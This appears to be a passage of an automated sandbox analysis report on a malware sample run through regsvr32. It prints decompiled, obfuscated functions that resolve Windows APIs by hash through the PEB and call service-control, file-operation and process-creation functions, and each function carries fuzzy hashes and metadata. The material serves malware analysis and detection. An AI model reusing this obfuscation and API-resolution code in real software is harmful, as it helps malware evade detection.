4937->4939 4938->4936 4939->4937 4941 1cd7d6 4940->4941 4942 1dbff0 GetPEB 4941->4942 4943 1cd87c 4942->4943 4943->4837 4945 1e0e92 4944->4945 4947 1cfbf8 GetPEB 4945->4947 4948 1e1061 4945->4948 4951 1e1076 4945->4951 4966 1dd0a1 4945->4966 4970 1c2f1a 4945->4970 4947->4945 4950 1de373 2 API calls 4948->4950 4950->4951 4951->4857 4953 1dbff0 GetPEB 4952->4953 4954 1cfcac 4953->4954 4954->4857 4964 1cdb99 4955->4964 4957 1cb184 GetPEB 4957->4964 4958 1cdf48 4974 1e1d6d 4958->4974 4959 1c4bb4 2 API calls 4959->4964 4961 1ce07b 4961->4961 4964->4957 4964->4958 4964->4959 4964->4961 4965 1cb9d7 GetPEB 4964->4965 4978 1d5a47 4964->4978 4982 1de8e7 4964->4982 4965->4964 4967 1dd0bd 4966->4967 4968 1dbff0 GetPEB 4967->4968 4969 1dd13e 4968->4969 4969->4945 4971 1c2f3e 4970->4971 4972 1dbff0 GetPEB 4971->4972 4973 1c2fcc 4972->4973 4973->4945 4975 1e1d80 4974->4975 4976 1dbff0 GetPEB 4975->4976 4977 1cdf59 4976->4977 4977->4857 4979 1d5a82 4978->4979 4980 1dbff0 GetPEB 4979->4980 4981 1d5b29 4980->4981 4981->4964 4983 1de902 4982->4983 4984 1dbff0 GetPEB 4983->4984 4985 1de994 4984->4985 4985->4964 4987 1c3c6f 4986->4987 4988 1c3eff 4987->4988 4999 1d3ff6 4987->4999 4988->4864 4991 1d1d1c GetPEB 4993 1c3eb6 4991->4993 4992 1d1d1c GetPEB 4992->4993 4993->4988 4993->4992 4997 1d0e27 4994->4997 4995 1d0f48 4995->4864 4996 1de9a4 GetPEB 4996->4997 4997->4995 4997->4996 5003 1c3455 4997->5003 5000 1d4017 4999->5000 5001 1dbff0 GetPEB 5000->5001 5002 1c3e94 5001->5002 5002->4988 5002->4991 5004 1c3468 5003->5004 5005 1dbff0 GetPEB 5004->5005 5006 1c3502 5005->5006 5006->4997 5008 1dda29 5007->5008 5009 1dbff0 GetPEB 5008->5009 5010 1c3149 5009->5010 5010->3884 5012 1d5cca 5011->5012 5013 1dbff0 GetPEB 5012->5013 5014 1d5d5a 5013->5014 5014->4084 5017 1d00ae 5015->5017 5016 1d7394 GetPEB 5016->5017 5017->5016 5018 1deaa3 2 API calls 5017->5018 5019 1d040e 5017->5019 5018->5017 5019->4084 5021 1cf61e 5020->5021 5022 1dbff0 GetPEB 5021->5022 5023 1cf6be 5022->5023 5023->4084 5025 
1dbff0 GetPEB 5024->5025 5026 1ce370 5025->5026 5026->4084 5028 1cf9bd 5027->5028 5029 1dbff0 GetPEB 5028->5029 5030 1cfa61 5029->5030 5030->4079 5032 1d5c1b 5031->5032 5033 1dbff0 GetPEB 5032->5033 5034 1d5ca5 5033->5034 5034->4088 5036 1ce0fe 5035->5036 5037 1dbff0 GetPEB 5036->5037 5038 1ce19d 5037->5038 5038->4088 5042 1cd8af 5039->5042 5040 1cda67 5063 1cff02 5040->5063 5042->5040 5044 1cda65 5042->5044 5045 1cb184 GetPEB 5042->5045 5059 1d1c3c 5042->5059 5044->4102 5045->5042 5048 1c9425 5046->5048 5047 1c4bb4 2 API calls 5047->5048 5048->5047 5049 1c3f09 GetPEB 5048->5049 5050 1c954c 5048->5050 5052 1cb9d7 GetPEB 5048->5052 5054 1c954a 5048->5054 5067 1d462a 5048->5067 5049->5048 5051 1c3152 GetPEB 5050->5051 5051->5054 5052->5048 5054->4102 5056 1cf6e5 5055->5056 5057 1dbff0 GetPEB 5056->5057 5058 1cf778 5057->5058 5058->4112 5060 1d1c5e 5059->5060 5061 1dbff0 GetPEB 5060->5061 5062 1d1d0f 5061->5062 5062->5042 5064 1cff24 5063->5064 5065 1dbff0 GetPEB 5064->5065 5066 1cffca 5065->5066 5066->5044 5068 1d4649 5067->5068 5069 1dbff0 GetPEB 5068->5069 5070 1d46d3 5069->5070 5070->5048 5081 1c5c9a 5088 1c617c 5081->5088 5082 1c6a8d GetPEB 5082->5088 5083 1dbf1c 2 API calls 5083->5088 5084 1c638d 5085 1c9574 GetPEB 5085->5088 5086 1c638f 5089 1de373 2 API calls 5086->5089 5088->5082 5088->5083 5088->5084 5088->5085 5088->5086 5090 1cffde GetPEB 5088->5090 5091 1deaa3 2 API calls 5088->5091 5094 1dab39 5088->5094 5098 1d589f 5088->5098 5102 1e2727 5088->5102 5089->5084 5090->5088 5091->5088 5095 1dab6c 5094->5095 5096 1dbff0 GetPEB 5095->5096 5097 1dac10 5096->5097 5097->5088 5099 1d58b2 5098->5099 5100 1dbff0 GetPEB 5099->5100 5101 1d5949 5100->5101 5101->5088 5103 1e2737 5102->5103 5104 1dbff0 GetPEB 5103->5104 5105 1e27d3 5104->5105 5105->5088 5119 1c88e5 5120 1c8a5e 5119->5120 5121 1c8aa9 5120->5121 5122 1de18b 2 API calls 5120->5122 5123 1c8a79 5122->5123 5127 1d08c0 5123->5127 5126 1cb9d7 GetPEB 5126->5121 5130 1d08e5 5127->5130 5128 1c8a91 5128->5126 
5130->5128 5131 1d19a4 5130->5131 5132 1d19bd 5131->5132 5133 1dbff0 GetPEB 5132->5133 5134 1d1a63 5133->5134 5134->5130 5071 1d63f0 5072 1d641e 5071->5072 5073 1cb184 GetPEB 5072->5073 5074 1d663b 5073->5074 5075 1d46e0 2 API calls 5074->5075 5077 1d6676 5075->5077 5076 1d6683 5077->5076 5078 1de373 2 API calls 5077->5078 5079 1d66a3 5078->5079 5080 1de373 2 API calls 5079->5080 5080->5076
C-Code - Quality: 58%
E001CF1D5(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
	signed int _v8;
	unsigned int _v12;
	unsigned int _v16;
	signed int _v20;
	intOrPtr _v24;
	intOrPtr _v28;
	intOrPtr _v32;
	intOrPtr _v36;
	void* _t49;
	intOrPtr* _t58;
	void* _t59;
	signed int _t62;
	void* _t67;
	void* _t68;

	_t68 = __edx;
	_t67 = __ecx;
	E001C9E7D(_t49);
	_v36 = 0xea873e;
	_v32 = 0xb2392b;
	_v28 = 0;
	_v24 = 0;
	_v12 = 0xdc192d;
	_v12 = _v12 >> 0xa;
	_v12 = _v12 >> 0xf;
	_v12 = _v12 + 0x11b5;
	_v12 = _v12 ^ 0x0007f5c7;
	_v20 = 0x6dcef4;
	_t62 = 0x6b;
	_v20 = _v20 * 0x54;
	_v20 = _v20 << 0x10;
	_v20 = _v20 ^ 0xe81a0a50;
	_v16 = 0x9ccfab;
	_v16 = _v16 | 0xc76ed5d6;
	_v16 = _v16 >> 0xf;
	_v16 = _v16 ^ 0x000c5bda;
	_v8 = 0xcca784;
	_v8 = _v8 / _t62;
	_v8 = _v8 >> 0xf;
	_v8 = _v8 ^ 0x01549e3f;
	_v8 = _v8 ^ 0x01571d5c;
	_t58 = E001DBFF0(0xac802c42, 0x317, _t62, _t62, 0x42a4b2ae);
	_t59 = *_t58(_t67, 0, _t68, 0x28, __ecx, __edx, _a4, _a8, 0, _a16, _a20, 0x28); // executed
	return _t59;
}

                                                                                                                APIs
                                                                                                                • SetFileInformationByHandle.KERNEL32(00000000,00000000,?,00000028,?,?,?,?,?,?,?,?,00000028,00000000,0000002C,00000000), ref: 001CF2B0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.474534768.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.474531463.00000000001C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.474551928.00000000001E4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_1c0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileHandleInformation
                                                                                                                • String ID:
                                                                                                                • API String ID: 3935143524-0
                                                                                                                • Opcode ID: 77f1dd4d0ad90e3cc37e42a6920fbdcf951fc3ee27da9feae082ec12eeed1182
                                                                                                                • Instruction ID: 2282a8455d97445486a70008b0db38033c04ef83d6d10663c97b6c11763cd4bd
                                                                                                                • Opcode Fuzzy Hash: 77f1dd4d0ad90e3cc37e42a6920fbdcf951fc3ee27da9feae082ec12eeed1182
                                                                                                                • Instruction Fuzzy Hash: 792146B5D0121DAFDB08DFA5C88A8EEBBB4FB44708F10809DE515AA240C7B45B54DFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 498 1c32b5-1c338a call 1c9e7d call 1dbff0 OpenSCManagerW
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E001C32B5(void* __ecx, void* __edx, int _a4, intOrPtr _a12) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				short* _v24;
                                                                                                                				short* _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				void* _t49;
                                                                                                                				void* _t62;
                                                                                                                				signed int _t64;
                                                                                                                				signed int _t65;
                                                                                                                
                                                                                                                				_push(0);
                                                                                                                				_push(_a12);
                                                                                                                				_push(0);
                                                                                                                				_push(_a4);
                                                                                                                				E001C9E7D(_t49);
                                                                                                                				_v32 = 0xf329ca;
                                                                                                                				_v28 = 0;
                                                                                                                				_v24 = 0;
                                                                                                                				_v16 = 0x2373b;
                                                                                                                				_t64 = 0x7a;
                                                                                                                				_v16 = _v16 * 0x75;
                                                                                                                				_t65 = 0x3d;
                                                                                                                				_v16 = _v16 / _t64;
                                                                                                                				_v16 = _v16 ^ 0x00061266;
                                                                                                                				_v12 = 0xb7be71;
                                                                                                                				_v12 = _v12 >> 0xb;
                                                                                                                				_v12 = _v12 + 0xafdb;
                                                                                                                				_v12 = _v12 ^ 0x7920a4e8;
                                                                                                                				_v12 = _v12 ^ 0x79205c77;
                                                                                                                				_v8 = 0x1abc5;
                                                                                                                				_v8 = _v8 / _t65;
                                                                                                                				_v8 = _v8 << 0xb;
                                                                                                                				_v8 = _v8 ^ 0x07f89b39;
                                                                                                                				_v8 = _v8 ^ 0x07caeaee;
                                                                                                                				_v20 = 0x49b926;
                                                                                                                				_v20 = _v20 * 0x47;
                                                                                                                				_v20 = _v20 ^ 0x147483b3;
                                                                                                                				E001DBFF0(0x11de522c, 0x30d, _t65, _t65, 0xea9607);
                                                                                                                				_t62 = OpenSCManagerW(0, 0, _a4); // executed
                                                                                                                				return _t62;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,79205C77,?,?,?,?,?,?,?,?,00000000), ref: 001C3384
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.474534768.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.474531463.00000000001C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.474551928.00000000001E4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_1c0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ManagerOpen
                                                                                                                • String ID: w\ y
                                                                                                                • API String ID: 1889721586-240614871
                                                                                                                • Opcode ID: 1f5861dd61b294354832cf9b9edfb87b87b26e314b348a251be8c10d0985441e
                                                                                                                • Instruction ID: 3d7c52043628b31cb1fafec5bc69fd1b4ddc9f9cf6a6296a5842bfa8d41df353
                                                                                                                • Opcode Fuzzy Hash: 1f5861dd61b294354832cf9b9edfb87b87b26e314b348a251be8c10d0985441e
                                                                                                                • Instruction Fuzzy Hash: C22123B5D01228FBCB04DFA9D88A9EEBFB5FB40304F208189E425A6250D3B55B40DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 503 1cc4eb-1cc5c2 call 1c9e7d call 1dbff0 OpenServiceW
                                                                                                                C-Code - Quality: 76%
                                                                                                                			E001CC4EB(void* __ecx, int __edx, short* _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				intOrPtr _v36;
                                                                                                                				void* _t46;
                                                                                                                				void* _t54;
                                                                                                                				int _t58;
                                                                                                                
                                                                                                                				_push(_a16);
                                                                                                                				_t58 = __edx;
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E001C9E7D(_t46);
                                                                                                                				_v24 = _v24 & 0x00000000;
                                                                                                                				_v36 = 0xd40f1;
                                                                                                                				_v32 = 0xcb52a0;
                                                                                                                				_v28 = 0x146fa1;
                                                                                                                				_v20 = 0xb8dab7;
                                                                                                                				_v20 = _v20 >> 1;
                                                                                                                				_v20 = _v20 << 5;
                                                                                                                				_v20 = _v20 ^ 0x0b80f677;
                                                                                                                				_v8 = 0x87dd92;
                                                                                                                				_v8 = _v8 + 0xffffe9d3;
                                                                                                                				_v8 = _v8 * 0x55;
                                                                                                                				_v8 = _v8 << 0xa;
                                                                                                                				_v8 = _v8 ^ 0x54d92ec5;
                                                                                                                				_v16 = 0xb88fea;
                                                                                                                				_v16 = _v16 | 0xf85cd4fd;
                                                                                                                				_v16 = _v16 + 0xed22;
                                                                                                                				_v16 = _v16 ^ 0xf8f0d6dc;
                                                                                                                				_v12 = 0x2c3d87;
                                                                                                                				_v12 = _v12 + 0x3690;
                                                                                                                				_v12 = _v12 + 0xfffff048;
                                                                                                                				_v12 = _v12 ^ 0x0029d00c;
                                                                                                                				E001DBFF0(0x11de522c, 0xe1, __ecx, __ecx, 0x5fb2da2f);
                                                                                                                				_t54 = OpenServiceW(_a8, _a4, _t58); // executed
                                                                                                                				return _t54;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • OpenServiceW.ADVAPI32(F8F0D6DC,0029D00C,?,?,?,?,?,?,?,?,?,?), ref: 001CC5BC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.474534768.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.474531463.00000000001C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.474551928.00000000001E4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_1c0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: OpenService
                                                                                                                • String ID: "
                                                                                                                • API String ID: 3098006287-1598837362
                                                                                                                • Opcode ID: a522d33089ec895b54db4c824c20dd1e836209a16b7f06b25475ede4dc9ef992
                                                                                                                • Instruction ID: 014ad977955a1261e77ad7fbfd0464804424df1a874fc843910935ef878996ad
                                                                                                                • Opcode Fuzzy Hash: a522d33089ec895b54db4c824c20dd1e836209a16b7f06b25475ede4dc9ef992
                                                                                                                • Instruction Fuzzy Hash: 562120B6C0020DEBCF15DFA4D8499EEBBB4FF14318F108588E92566260E3B19B18DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 508 1da98e-1daa51 call 1c9e7d call 1dbff0 CloseServiceHandle
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E001DA98E(void* __ecx, void* __edx, void* _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void* _t45;
                                                                                                                				int _t58;
                                                                                                                				signed int _t60;
                                                                                                                				signed int _t61;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				E001C9E7D(_t45);
                                                                                                                				_v24 = _v24 & 0x00000000;
                                                                                                                				_v28 = 0xdfb18c;
                                                                                                                				_v12 = 0xac05d3;
                                                                                                                				_v12 = _v12 + 0xffffe692;
                                                                                                                				_t60 = 6;
                                                                                                                				_v12 = _v12 * 0xa;
                                                                                                                				_v12 = _v12 ^ 0x06b0bc77;
                                                                                                                				_v20 = 0xcbcea5;
                                                                                                                				_t61 = 0x73;
                                                                                                                				_v20 = _v20 / _t60;
                                                                                                                				_v20 = _v20 ^ 0x0026c0c8;
                                                                                                                				_v16 = 0x706a69;
                                                                                                                				_v16 = _v16 + 0xffff322e;
                                                                                                                				_v16 = _v16 ^ 0x006745ff;
                                                                                                                				_v8 = 0xc7f3e7;
                                                                                                                				_v8 = _v8 * 0x7b;
                                                                                                                				_v8 = _v8 + 0xffffee1e;
                                                                                                                				_v8 = _v8 / _t61;
                                                                                                                				_v8 = _v8 ^ 0x00d4d133;
                                                                                                                				E001DBFF0(0x11de522c, 0x223, _t61, _t61, 0x2fdf0f26);
                                                                                                                				_t58 = CloseServiceHandle(_a4); // executed
                                                                                                                				return _t58;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • CloseServiceHandle.ADVAPI32(06B0BC77,?,?,?,?,?,?,?,?), ref: 001DAA4C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.474534768.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.474531463.00000000001C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.474551928.00000000001E4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_1c0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleService
                                                                                                                • String ID: ijp
                                                                                                                • API String ID: 1725840886-2001787820
                                                                                                                • Opcode ID: 1ca84afc33d7b938950ae22bf4e2629023950455804043fd17485c6cfe7ce1c4
                                                                                                                • Instruction ID: ebe841db5b2b724f578798753eb9f677dc0131a1d417290f29619c5faace78dd
                                                                                                                • Opcode Fuzzy Hash: 1ca84afc33d7b938950ae22bf4e2629023950455804043fd17485c6cfe7ce1c4
                                                                                                                • Instruction Fuzzy Hash: 182117B5D0520DFBEF04DFA4D98A9AEBBB1EB40304F10C19AE405AB250D7B49B449F84
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 513 1c338b-1c3454 call 1c9e7d call 1dbff0 SHFileOperationW
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E001C338B(void* __ecx, void* __edx, struct _SHFILEOPSTRUCTW* _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				void* _t46;
                                                                                                                				int _t58;
                                                                                                                				signed int _t60;
                                                                                                                
                                                                                                                				_push(_a4);
                                                                                                                				E001C9E7D(_t46);
                                                                                                                				_v28 = _v28 & 0x00000000;
                                                                                                                				_v24 = _v24 & 0x00000000;
                                                                                                                				_v32 = 0x221b15;
                                                                                                                				_v20 = 0x156690;
                                                                                                                				_t60 = 5;
                                                                                                                				_v20 = _v20 * 0x69;
                                                                                                                				_v20 = _v20 ^ 0x08c90ac4;
                                                                                                                				_v12 = 0x1a8107;
                                                                                                                				_v12 = _v12 / _t60;
                                                                                                                				_v12 = _v12 | 0x5e0d12b3;
                                                                                                                				_v12 = _v12 * 0x36;
                                                                                                                				_v12 = _v12 ^ 0xd6d73012;
                                                                                                                				_v8 = 0x305b7c;
                                                                                                                				_v8 = _v8 + 0xffffaa6a;
                                                                                                                				_v8 = _v8 << 0xf;
                                                                                                                				_v8 = _v8 | 0xeac0b19d;
                                                                                                                				_v8 = _v8 ^ 0xeaf3a664;
                                                                                                                				_v16 = 0x5b8d10;
                                                                                                                				_v16 = _v16 * 0x69;
                                                                                                                				_v16 = _v16 + 0x95d4;
                                                                                                                				_v16 = _v16 ^ 0x258da45e;
                                                                                                                				E001DBFF0(0xee7aaf55, 0x302, _t60, _t60, 0x2f7a8b42);
                                                                                                                				_t58 = SHFileOperationW(_a4); // executed
                                                                                                                				return _t58;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • SHFileOperationW.SHELL32(D6D73012,?,?,?,?,?,?,?), ref: 001C344F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.474534768.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.474531463.00000000001C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.474551928.00000000001E4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_1c0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileOperation
                                                                                                                • String ID: |[0
                                                                                                                • API String ID: 3080627654-3711761429
                                                                                                                • Opcode ID: 192e83401a02290710fada622201ed24515585c6a043cd12288e9317895715c1
                                                                                                                • Instruction ID: 89d64456fc19b53e7c52a546aaa4c460278ac256a97eca7fba60c6b7bbe7a22a
                                                                                                                • Opcode Fuzzy Hash: 192e83401a02290710fada622201ed24515585c6a043cd12288e9317895715c1
                                                                                                                • Instruction Fuzzy Hash: 052136B4D00209EFCF04DFA5C98AAEEBBB4FB10304F10818DE424AA250D7B96B548F90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 85%
                                                                                                                			E001DE373(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* _t41;
                                                                                                                				int _t51;
                                                                                                                				signed int _t53;
                                                                                                                				void* _t58;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_t58 = __edx;
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				E001C9E7D(_t41);
                                                                                                                				_v20 = 0xc362e1;
                                                                                                                				_v20 = _v20 + 0xffff2419;
                                                                                                                				_v20 = _v20 + 0xffff15b9;
                                                                                                                				_v20 = _v20 ^ 0x00c90db5;
                                                                                                                				_v16 = 0x370fa8;
                                                                                                                				_v16 = _v16 + 0x3ddc;
                                                                                                                				_v16 = _v16 + 0xfffffca4;
                                                                                                                				_v16 = _v16 ^ 0x003af0ce;
                                                                                                                				_v8 = 0x58cda3;
                                                                                                                				_t53 = 0x37;
                                                                                                                				_v8 = _v8 / _t53;
                                                                                                                				_v8 = _v8 | 0xee3498e5;
                                                                                                                				_v8 = _v8 + 0xffff3fab;
                                                                                                                				_v8 = _v8 ^ 0xee3595ac;
                                                                                                                				_v12 = 0xe7384d;
                                                                                                                				_v12 = _v12 + 0x2a59;
                                                                                                                				_v12 = _v12 * 0x31;
                                                                                                                				_v12 = _v12 ^ 0x2c4bf561;
                                                                                                                				E001DBFF0(0xac802c42, 0x278, _t53, _t53, 0x298e9f43);
                                                                                                                				_t51 = CloseHandle(_t58); // executed
                                                                                                                				return _t51;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,001D3F2A,00000000), ref: 001DE42F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.474534768.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.474531463.00000000001C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.474551928.00000000001E4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_1c0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID: M8
                                                                                                                • API String ID: 2962429428-669864304
                                                                                                                • Opcode ID: 68676e9891b26dd68fe09ea734f654e49ab76dccc486115711d770e020b531c2
                                                                                                                • Instruction ID: aeac188e18333a3e4f3ecd998f98219ff37e4a37cfada19d7ae2af9eee80298a
                                                                                                                • Opcode Fuzzy Hash: 68676e9891b26dd68fe09ea734f654e49ab76dccc486115711d770e020b531c2
                                                                                                                • Instruction Fuzzy Hash: BE1159B5D00209EFDF58DFA4C84989EBBB4EB40324F108299E824B6290D3B55B058F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 43%
                                                                                                                			E001D46E0(void* __ecx, struct _PROCESS_INFORMATION* __edx, long _a8, intOrPtr _a12, struct _STARTUPINFOW* _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, WCHAR* _a40, intOrPtr _a44, int _a48, intOrPtr _a56, intOrPtr _a60, WCHAR* _a64, intOrPtr _a68) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* _t55;
                                                                                                                				int _t64;
                                                                                                                				signed int _t66;
                                                                                                                				struct _PROCESS_INFORMATION* _t72;
                                                                                                                
                                                                                                                				_push(_a68);
                                                                                                                				_t72 = __edx;
                                                                                                                				_push(_a64);
                                                                                                                				_push(_a60);
                                                                                                                				_push(_a56);
                                                                                                                				_push(0);
                                                                                                                				_push(_a48);
                                                                                                                				_push(_a44);
                                                                                                                				_push(_a40);
                                                                                                                				_push(0);
                                                                                                                				_push(_a32);
                                                                                                                				_push(_a28);
                                                                                                                				_push(_a24);
                                                                                                                				_push(0);
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(0);
                                                                                                                				_push(__edx);
                                                                                                                				E001C9E7D(_t55);
                                                                                                                				_v8 = 0x728488;
                                                                                                                				_v8 = _v8 + 0x86b5;
                                                                                                                				_v8 = _v8 << 0xb;
                                                                                                                				_v8 = _v8 + 0xe7c2;
                                                                                                                				_v8 = _v8 ^ 0x98526b3c;
                                                                                                                				_v16 = 0xdd86ac;
                                                                                                                				_v16 = _v16 | 0x9093749e;
                                                                                                                				_v16 = _v16 + 0x773d;
                                                                                                                				_v16 = _v16 ^ 0x90e3102d;
                                                                                                                				_v20 = 0xa04379;
                                                                                                                				_v20 = _v20 + 0xe8c2;
                                                                                                                				_v20 = _v20 ^ 0x00a70f96;
                                                                                                                				_v12 = 0x20815c;
                                                                                                                				_t66 = 0x4c;
                                                                                                                				_v12 = _v12 / _t66;
                                                                                                                				_v12 = _v12 | 0xbbf973da;
                                                                                                                				_v12 = _v12 ^ 0xbbf5b48f;
                                                                                                                				E001DBFF0(0xac802c42, 0x58, _t66, _t66, 0xb43c22a7);
                                                                                                                				_t64 = CreateProcessW(_a64, _a40, 0, 0, _a48, _a8, 0, 0, _a16, _t72); // executed
                                                                                                                				return _t64;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,90E3102D,00000000,00000000,00000000), ref: 001D47CA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.474534768.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.474531463.00000000001C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.474551928.00000000001E4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_1c0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: e0c050ce58c662d84963154c999a7e43a34ddb0fe429297838269ca99bc78211
                                                                                                                • Instruction ID: 4936a3113a62e86c986a9f4c3d14ffed618cffda102498af4d541170974e467e
                                                                                                                • Opcode Fuzzy Hash: e0c050ce58c662d84963154c999a7e43a34ddb0fe429297838269ca99bc78211
                                                                                                                • Instruction Fuzzy Hash: FD31F472900248FBDF559F95CD09CDEBF75FB89314F008148FA2462120D7769A64DF60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 55%
                                                                                                                			E001DBF1C(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, WCHAR* _a20, long _a24, long _a36, intOrPtr _a40) {
                                                                                                                				unsigned int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* _t47;
                                                                                                                				void* _t55;
